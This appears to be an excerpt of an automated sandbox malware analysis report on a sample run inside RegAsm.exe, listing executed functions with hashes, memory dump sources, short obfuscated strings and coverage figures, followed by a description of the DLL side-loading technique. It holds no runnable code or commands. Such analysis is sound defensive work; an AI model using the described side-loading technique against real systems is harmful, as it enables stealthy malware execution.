Instruction Fuzzy Hash: F1A19F32E002168FCF15DFB4C88459EB7B2FF86304B14457AE906AB266DB75ED16DB80

Function 04FA0120 Relevance: .2, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2084764830.0000000004FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4fa0000_z87sammylastborn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 799f5948016b02d6923a178bd7aabb5328326e39a20fef96817324bb05cfa737
Instruction ID: 860b17dec2ee38510d280ebeba1aec6a2080de2ef39a403a7ec1d6c1e3b9fc45
Opcode Fuzzy Hash: 799f5948016b02d6923a178bd7aabb5328326e39a20fef96817324bb05cfa737
Instruction Fuzzy Hash: 2FC1D2B080174A8ED730EF65ED481897BB1BBA53A4F504319D1A16B2FCDBBA158BCF44

Analysis Process: RegAsm.exePID: 2276, Parent PID: 5656COMMON

Execution Graph

Execution Coverage:	13.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	8.3%
Total number of Nodes:	48
Total number of Limit Nodes:	4

Executed Functions

Function 050D7770 Relevance: 12.2, Strings: 9, Instructions: 911COMMON

Download Yara Rule

Strings

(ojq, xrefs: 050D7D41
(ojq, xrefs: 050D7869
(ojq, xrefs: 050D77AE
(ojq, xrefs: 050D7895
(ojq, xrefs: 050D7C8F
(ojq, xrefs: 050D7932
,nq, xrefs: 050D7C20
,nq, xrefs: 050D7C10
(ojq, xrefs: 050D7C7F

Memory Dump Source

Source File: 00000003.00000002.4535152239.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_50d0000_RegAsm.jbxd

Similarity

API ID:
String ID: (ojq$(ojq$(ojq$(ojq$(ojq$(ojq$(ojq$,nq$,nq
API String ID: 0-2862514371
Opcode ID: dd40a4e4a131dde919c7c0ff3cd1125422c17ad1bf930eba32a9c8fff333c921
Instruction ID: f8a5df7cbf8f8cdc44516fcf00dfce5e1e508245ed386daa3914033e90b601f5
Opcode Fuzzy Hash: dd40a4e4a131dde919c7c0ff3cd1125422c17ad1bf930eba32a9c8fff333c921
Instruction Fuzzy Hash: 97823A31A006099FCB14CF69E984EAEFBF6FF88314F158559E8469B2A1D734ED41CB60

Function 050D6998 Relevance: 8.5, Strings: 6, Instructions: 962COMMON

Download Yara Rule

Strings

(ojq, xrefs: 050D6F56
,nq, xrefs: 050D7318
Hnq, xrefs: 050D6E22
(ojq, xrefs: 050D7292
,nq, xrefs: 050D730A
(ojq, xrefs: 050D72A0

Memory Dump Source

Source File: 00000003.00000002.4535152239.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_50d0000_RegAsm.jbxd

Similarity

API ID:
String ID: (ojq$(ojq$(ojq$,nq$,nq$Hnq
API String ID: 0-2901307771
Opcode ID: c57d1ee06d5681acd70e90876d971c0142b2eb449fa92805daae9272a1936ca4
Instruction ID: ca8da55a0afc2385850998f8da2f5bf9f91fce6c5070fbb16b3ccf3186243708
Opcode Fuzzy Hash: c57d1ee06d5681acd70e90876d971c0142b2eb449fa92805daae9272a1936ca4
Instruction Fuzzy Hash: 9B826D70A002199FCB55DF69D894BAEBBF6FF88300F148569E8059B3A5DB35DC41CBA0

Function 050D1C58 Relevance: 2.7, Strings: 2, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHjq, xrefs: 050D1EA3
PHjq, xrefs: 050D1E92

Memory Dump Source

Source File: 00000003.00000002.4535152239.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_50d0000_RegAsm.jbxd

Similarity

API ID:
String ID: PHjq$PHjq
API String ID: 0-3092175318
Opcode ID: 76dfd3ae6d0007dd1f7fcd3c46ef2680bce2f2309e2a48244eed5ab0305a381e
Instruction ID: a897ecd97504d7d15b36479fcffe90edf16d5bded62ede1f13632fd7db6abb6b
Opcode Fuzzy Hash: 76dfd3ae6d0007dd1f7fcd3c46ef2680bce2f2309e2a48244eed5ab0305a381e
Instruction Fuzzy Hash: D8819E74E003188FDB58DFAAD9947ADFBF2BF89300F20816AD419AB294DB745945CF50

Function 02A4C168 Relevance: 2.0, APIs: 1, Instructions: 528
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.4533750277.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2a40000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4820c743d9e195b7674e45d2258aa55e7f4b65b477b6511a51f28393910182cd
Instruction ID: 923c958431cd470d24a297bbec420cf6a4ef78d799b460ff44bbb227b30e6028
Opcode Fuzzy Hash: 4820c743d9e195b7674e45d2258aa55e7f4b65b477b6511a51f28393910182cd
Instruction Fuzzy Hash: 3F223670E012198FCB14DFA8C984B9DBBB2BF88314F5085AAD809AB355DF75D986CF50

Function 050D4500 Relevance: .7, Instructions: 745COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4535152239.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_50d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d2df64d2ff3fa454a37fbaf2eb83667c0634a2c796805cd2a3f990f3c7a4d20
Instruction ID: b66359f70d78cd22bb17952f159a470bc42b250fa144c081b39fb590d9ea7d26
Opcode Fuzzy Hash: 0d2df64d2ff3fa454a37fbaf2eb83667c0634a2c796805cd2a3f990f3c7a4d20
Instruction Fuzzy Hash: C9826B74E012298FDB64DF69DD94B9DBBB2BF88300F1481EA984DA7265DB305E81CF50

Function 050D15F8 Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4535152239.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_50d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abf5343ef7da1752c4817ef4a222c72b96d9fb91f66b30655a021cd7571aa28c
Instruction ID: 0c0c2fa3b3b4a8d6e7f97bb71631181eb989763c4ae944b809bfa7a382fbafdc
Opcode Fuzzy Hash: abf5343ef7da1752c4817ef4a222c72b96d9fb91f66b30655a021cd7571aa28c
Instruction Fuzzy Hash: 3CE1D2B4E01218CFDB64DFA5D944B9DBBB2FF88300F2081A9D809A7395DB359A85CF10

Function 050D15EA Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4535152239.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_50d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53273bd3172dac4911b6021ad1c67c641baf60c0896a7b5d06de108e2de05ae
Instruction ID: 52e52452da728a712295f1fd6af777ba4a37165df6ba669d72067c57511b93aa
Opcode Fuzzy Hash: f53273bd3172dac4911b6021ad1c67c641baf60c0896a7b5d06de108e2de05ae
Instruction Fuzzy Hash: 5941CFB0D006088BEB18DFAAD9547DEFBF2BF89300F54C16AC418AB264DB755946CF24

Function 050D8848 Relevance: 3.3, Strings: 2, Instructions: 786
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$jq, xrefs: 050D936C
$jq, xrefs: 050D938F

Memory Dump Source

Source File: 00000003.00000002.4535152239.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_50d0000_RegAsm.jbxd

Similarity

API ID:
String ID: $jq$$jq
API String ID: 0-3720491408
Opcode ID: 56d99300b6a2a56e96b95556d8420891b8f880303be50ae02bd619788e734d86
Instruction ID: 07886d0efe74bed04baf1c84df107f01ecb96f34385a69c8143010a3d51857a4
Opcode Fuzzy Hash: 56d99300b6a2a56e96b95556d8420891b8f880303be50ae02bd619788e734d86
Instruction Fuzzy Hash: FB624D70A002188FEB659BA4D960BEEBBB7FF84300F1084A9C50A6B3A5DF359D45DF51

Function 050D65F1 Relevance: 2.7, Strings: 2, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

,nq, xrefs: 050D66D6
,nq, xrefs: 050D66E0

Memory Dump Source

Source File: 00000003.00000002.4535152239.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_50d0000_RegAsm.jbxd

Similarity

API ID:
String ID: ,nq$,nq
API String ID: 0-3932345633
Opcode ID: 5c75f0f9ca116eb60906d43078ca15252d730afff63de9f213ada5978fb52804
Instruction ID: f6a21cc6775b9815ca99d505c05d0c3aae5efeac409063817a264d77d78b2611
Opcode Fuzzy Hash: 5c75f0f9ca116eb60906d43078ca15252d730afff63de9f213ada5978fb52804
Instruction Fuzzy Hash: 15818134A042058FCB54CF69E994A6EF7F2FF89314B158169D406E73A5DB32E841CFA0

Function 050D2508 Relevance: 2.7, Strings: 2, Instructions: 212
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(nq, xrefs: 050D26E2
(&jq, xrefs: 050D2623

Memory Dump Source

Source File: 00000003.00000002.4535152239.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_50d0000_RegAsm.jbxd

Similarity

API ID:
String ID: (&jq$(nq
API String ID: 0-2454636555
Opcode ID: da51daa0ca99b87b2bc45fb4d220d7a77bbc55d44eaa6d9bc4b0bb63d5ecd187
Instruction ID: b8fb55a236c76edf0e7bbbe381bdad28c59257edfc458a2aa5fbbe2210c89826
Opcode Fuzzy Hash: da51daa0ca99b87b2bc45fb4d220d7a77bbc55d44eaa6d9bc4b0bb63d5ecd187
Instruction Fuzzy Hash: DA716131F043199BCB15DBB8D8646EEBBF2AF89700F148529E406AB294DE309D46C7A1

Function 050D6130 Relevance: 2.7, Strings: 2, Instructions: 183
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hnq, xrefs: 050D625E
Hnq, xrefs: 050D622B

Memory Dump Source

Source File: 00000003.00000002.4535152239.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_50d0000_RegAsm.jbxd

Similarity

API ID:
String ID: Hnq$Hnq
API String ID: 0-3075287205
Opcode ID: f97c514e452b3723b42ada1e243d778348b1ac42f5f33344c5ee19df31cc9941
Instruction ID: 838ce2d40c13aad2df44f1f731c9bdad9857196050c8a18818e14bb410d37acd
Opcode Fuzzy Hash: f97c514e452b3723b42ada1e243d778348b1ac42f5f33344c5ee19df31cc9941
Instruction Fuzzy Hash: 6251AE357043559FDB258F64E854BBEBFE2FF89300F094569E8468B291DB36D802CBA0

Function 02A4C76C Relevance: 1.6, APIs: 1, Instructions: 62
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(00000000), ref: 02A4C8AE

Memory Dump Source

Source File: 00000003.00000002.4533750277.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2a40000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: dc9923086c58b1473c644988e2ad21e3434b39de51796fbb2db8e01f1e10bfed
Instruction ID: 5774557ea4e383619c42cc77e16beea85dab408bec10a1a6ad773df0c59e18a8
Opcode Fuzzy Hash: dc9923086c58b1473c644988e2ad21e3434b39de51796fbb2db8e01f1e10bfed
Instruction Fuzzy Hash: 67113D75E021099FDB04DBA8D484AADBBB6FFC8315F549166E808A7246DF70D941CB60

Function 050D5F08 Relevance: 1.4, Strings: 1, Instructions: 120COMMON

Download Yara Rule

Strings

d8oq, xrefs: 050D5F60

Memory Dump Source

Source File: 00000003.00000002.4535152239.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_50d0000_RegAsm.jbxd

Similarity

API ID:
String ID: d8oq
API String ID: 0-2048867746
Opcode ID: da58f3b3dd6b048ed6c1ea72e2ff8171192d697340ddb45fb42b14aa8ecb63a0
Instruction ID: 72338183a323841a708b13d79c86935d2ae43c2dd6f259f6706c554395157998
Opcode Fuzzy Hash: da58f3b3dd6b048ed6c1ea72e2ff8171192d697340ddb45fb42b14aa8ecb63a0
Instruction Fuzzy Hash: 5E418E343407018FC768AB39E858B6EBBE6BF89300F044569E546CB7A5DF65EC05CB54

Function 050D82F8 Relevance: 1.4, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

4'jq, xrefs: 050D8383

Memory Dump Source

Source File: 00000003.00000002.4535152239.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_50d0000_RegAsm.jbxd

Similarity

API ID:
String ID: 4'jq
API String ID: 0-3676250632
Opcode ID: c32248db02255a109ea87f6575b623a868646ab77d4b2425d57f5db3be828626
Instruction ID: d77a843d0a7b72ea78ec545e84c984308c8eac5542c4097c0dd947041e0e99ef
Opcode Fuzzy Hash: c32248db02255a109ea87f6575b623a868646ab77d4b2425d57f5db3be828626
Instruction Fuzzy Hash: 414127756002159FCB14DF28E988AAEBBF6FF49310F104069F906CB2A1CB75DD51CBA0

Function 050D8640 Relevance: 1.3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

Strings

4'jq, xrefs: 050D86BA

Memory Dump Source

Source File: 00000003.00000002.4535152239.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_50d0000_RegAsm.jbxd

Similarity

API ID:
String ID: 4'jq
API String ID: 0-3676250632
Opcode ID: 6d6ee97c22248b070dff93aa28235a52c9020e570131768ded25433d9c18012f
Instruction ID: c9e7e3ac0ce650a18e042cd41f3683129ce41bbed87e858c32e43ac6c48c02c7
Opcode Fuzzy Hash: 6d6ee97c22248b070dff93aa28235a52c9020e570131768ded25433d9c18012f
Instruction Fuzzy Hash: 3F2191357183598BC754DE26A944A7FFBEAFF85210B04C426F916D7644DBB1D8108BB0

Function 050D5EF8 Relevance: 1.3, Strings: 1, Instructions: 54COMMON

Download Yara Rule

Strings

d8oq, xrefs: 050D5F60

Memory Dump Source

Source File: 00000003.00000002.4535152239.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_50d0000_RegAsm.jbxd

Similarity

API ID:
String ID: d8oq
API String ID: 0-2048867746
Opcode ID: 6714cdf6d0a5e0bcf2b4759f4f4e0bdd2319d9fc2c091475df91490ccc0d12d2
Instruction ID: 8227e120ddfb6113b8038034cb4031c3f8f2a04bb815676aa90e98a8156a7de0
Opcode Fuzzy Hash: 6714cdf6d0a5e0bcf2b4759f4f4e0bdd2319d9fc2c091475df91490ccc0d12d2
Instruction Fuzzy Hash: 0E11A031200B014FC7259B2DEC44F6EFBEBAFC5350F048A28D4568B265EBA4E809CB91

Function 050D62A8 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4535152239.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_50d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95efdd09e8b1a41c776c6f8a26a7699bad7b817020b4f948d233c46f7fc7f2d7
Instruction ID: aa6af5b056f132ff138f7ceb6246b3dc8f7691440df336bd71da68f0ca529f82
Opcode Fuzzy Hash: 95efdd09e8b1a41c776c6f8a26a7699bad7b817020b4f948d233c46f7fc7f2d7
Instruction Fuzzy Hash: CC718E347043118FCB259B79E4A463EBBA6BFC9250B144569E9068B399DF35DC42CBA0

Function 050D84F8 Relevance: .2, Instructions: 178COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4535152239.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_50d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b25899c40725a590dc44248403b0206f189d49911b51d6a807a27f05ea44bd2b
Instruction ID: 60d1df42c9243cb44a334e3c849eb4a4ab84f972f65aa089992dd69d7e1c04c8
Opcode Fuzzy Hash: b25899c40725a590dc44248403b0206f189d49911b51d6a807a27f05ea44bd2b
Instruction Fuzzy Hash: A35181317142159FC754DF39E998E6EBBEAFF4865070584A9E406CB365EB31EC01CB60

Function 050D44F0 Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4535152239.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_50d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb6ce04d8914aeebe6beb3a588a126e4d5c81a27de24d2f3fe108afb9e54c586
Instruction ID: 7b524cc8407cffb200139da0652442f8691a618aec164244656f4719ac5f768a
Opcode Fuzzy Hash: bb6ce04d8914aeebe6beb3a588a126e4d5c81a27de24d2f3fe108afb9e54c586
Instruction Fuzzy Hash: 1281BF74E412299FDB64DF69D990BEDBBB2BF89300F1080EAD849A7254DB715E81CF40

Function 050D24F8 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4535152239.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_50d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1af703b09307ab08c1f2bc1f1100af0451f8603eb5f3d927453457bfaa79c53
Instruction ID: 8dcce9b12ed6a7e13ce81a3098975a17ea19f5369baa705380f7b1910740ab82
Opcode Fuzzy Hash: f1af703b09307ab08c1f2bc1f1100af0451f8603eb5f3d927453457bfaa79c53
Instruction Fuzzy Hash: 80415475E0031A9BDB15CFA5D990AEEFBF2BF88700F148119E406B7254DB71A946CBA0

Function 050D5858 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4535152239.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_50d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83784281e9f5c631468c0ca24168e6664ebd5ed0546e9c0c0dedb34786e2f80e
Instruction ID: 5301ec944b6e19357f534a8f6eb3787aa9e4ece3dad68226428b647e3f865278
Opcode Fuzzy Hash: 83784281e9f5c631468c0ca24168e6664ebd5ed0546e9c0c0dedb34786e2f80e
Instruction Fuzzy Hash: E0419E3160420A9FCF059FA4E854ABEBFB2FF89211F004019FD569B255DB39D922DFA0

Function 050D8729 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4535152239.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_50d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a991555f76c4999b4b8cea1306949dcc5f24a8dca03d5e924879bcddc7ccee9c
Instruction ID: 312a337b315f9f6f3ecdd445079c06cbefef45580b1f9b2ee41f42adba303bee
Opcode Fuzzy Hash: a991555f76c4999b4b8cea1306949dcc5f24a8dca03d5e924879bcddc7ccee9c
Instruction Fuzzy Hash: 122180347043014BDB64562AE954B7EA69BFFC5714F14C039D502CB394EE79C84297A0

Function 010AD030 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4533494757.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10ad000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5e954795c8d452e56872343b38a9245665773de6a30d1c08cb5aad6c9b0ac37
Instruction ID: 11f388e3c979a839fd94416b4ae9eec9adcdc366eea0972b5705c9e251c90f6c
Opcode Fuzzy Hash: d5e954795c8d452e56872343b38a9245665773de6a30d1c08cb5aad6c9b0ac37
Instruction Fuzzy Hash: B5214270144200DFCB11CFD8D980F26BFA5EB84314F60C5AEE9890B652C33AD846CB62

Function 050D26E9 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4535152239.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_50d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9aa95fd009641a7e766a225e546532938cc44da29434b75dfb446ea3fa22560b
Instruction ID: 086205875c87c3f503f126e55508788c0c3d21a88c1f2d8154f15656f97e7757
Opcode Fuzzy Hash: 9aa95fd009641a7e766a225e546532938cc44da29434b75dfb446ea3fa22560b
Instruction Fuzzy Hash: F2110B317083945FCB065B7898342AF3FA7EFCA210B044469E445DB391DE348C16C3D6

Function 050D2270 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4535152239.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_50d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3af4b829055b2824989c617aa56ff0e1d241108c08e9641eb6ff9eca40c3de1a
Instruction ID: 1a3225fecf4a85ee7bf28ba2cda4d85dcac69c34c03fbef568fae620e0063666
Opcode Fuzzy Hash: 3af4b829055b2824989c617aa56ff0e1d241108c08e9641eb6ff9eca40c3de1a
Instruction Fuzzy Hash: 551114B68003499FDB10DF99D944BEEBFF5EB48320F148419E518A7250C379A994DFA1

Function 050D1EB9 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4535152239.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_50d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2049837a0bf0826d454f6b03863938a366e7eb068de763d54ca957594b19da20
Instruction ID: 7853de63e2fb8dbf3bebc345d7089792a692080fb412d6c078cc5ef5837d4091
Opcode Fuzzy Hash: 2049837a0bf0826d454f6b03863938a366e7eb068de763d54ca957594b19da20
Instruction Fuzzy Hash: B911FA74E002498FDB04DFF9E850BEEFBB6AF48311F5094A5E808AB345EB309941CB60

Function 010AD02B Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4533494757.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10ad000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c3f0733ce8851a1589f40a5fbe057aabe2b6f8a867c37c7fcc40a2fdda36e59
Instruction ID: a29258a10da7e377812c550737f5c9e18879fd88bfc0aada3ef4e8bbcdf03f86
Opcode Fuzzy Hash: 5c3f0733ce8851a1589f40a5fbe057aabe2b6f8a867c37c7fcc40a2fdda36e59
Instruction Fuzzy Hash: 1C11D075544280DFDB12CF98D5C4B15FFB1FB84314F28C6AAD8894BA56C33AD44ACB62

Function 050D2990 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4535152239.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_50d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28266c53005f49fe380e28ca94009228a54442164f67ca34afb96b056020dd7e
Instruction ID: 11b9c1b7db787c90001afb96d9b2f9d6ecf845afa584934d9220ba277fe156b6
Opcode Fuzzy Hash: 28266c53005f49fe380e28ca94009228a54442164f67ca34afb96b056020dd7e
Instruction Fuzzy Hash: 361112B68002499FDB10CF99D944BDEBBF4EB48320F14845AE518A7250D339A694DFA1

Function 050D60B0 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4535152239.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_50d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a0b833281871d9b09964ab4e0521f113b1642948d0ace4c215f5ba93a4b00b
Instruction ID: e37f71875c8cbd0a8a98b6b092a8ea90ccf14117b272957b8cf0794ca2c97dad
Opcode Fuzzy Hash: c3a0b833281871d9b09964ab4e0521f113b1642948d0ace4c215f5ba93a4b00b
Instruction Fuzzy Hash: 0901D6327042186B8F059F59AC10AEF7FEBEBC9650F188029F915D7281DE72CC119BA0

Function 050D60A0 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4535152239.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_50d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c3a286e75e9a5852eb931f6efcb5527fef5d8aab1a968b5269c22bb90a0bff1
Instruction ID: ef1e8f518fe7945b064b28fa3b360196d8c418ad1e05ba690b632a73f642207e
Opcode Fuzzy Hash: 7c3a286e75e9a5852eb931f6efcb5527fef5d8aab1a968b5269c22bb90a0bff1
Instruction Fuzzy Hash: A0018172A082196BDF518F95EC01BDF7FAAEBC9750F188029F915C6242DA36C911DBA0

Function 050D68A1 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4535152239.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_50d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56d608db0ef6616fc2d0d76ba8399dd97edc49a6de5f6dc90f7a22a99c669620
Instruction ID: 2b5e2e2492271f9b25dbb76316a2cebfb1260db0b0e31a476f2ecc83f4250ea1
Opcode Fuzzy Hash: 56d608db0ef6616fc2d0d76ba8399dd97edc49a6de5f6dc90f7a22a99c669620
Instruction Fuzzy Hash: E5E0CD350443044FC705EFB9F945F587B6DFB80304F0446209005452AEDE78A10DCB70

Function 050D947D Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4535152239.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_50d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b7db2a4c09d2f14aa79d90d290936feaf8fb3ab9e715eafe628a91147267788
Instruction ID: 2779ab0730026518f2512dc1ca2cd120c7cb6e6dc32a3df0923a3fd422535d8b
Opcode Fuzzy Hash: 6b7db2a4c09d2f14aa79d90d290936feaf8fb3ab9e715eafe628a91147267788
Instruction Fuzzy Hash: CAD0673AB400189FCB049F98E8508DDFB76FB99221B048116F915E3261CA319925DB50

Function 050D68B0 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4535152239.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_50d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5adb27970e4d737e3627fd67cf09de3ba67658bb6c3be6d392f62ce716b36ae9
Instruction ID: 15830ebc2bceaf5d43c37b8805983b4cf7719202886ae8c4374c52b6e94868a1
Opcode Fuzzy Hash: 5adb27970e4d737e3627fd67cf09de3ba67658bb6c3be6d392f62ce716b36ae9
Instruction Fuzzy Hash: 90C012700443094EC605FBB5F9459693B2EEAC03047408520A0050D27DDF78684E8B90

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
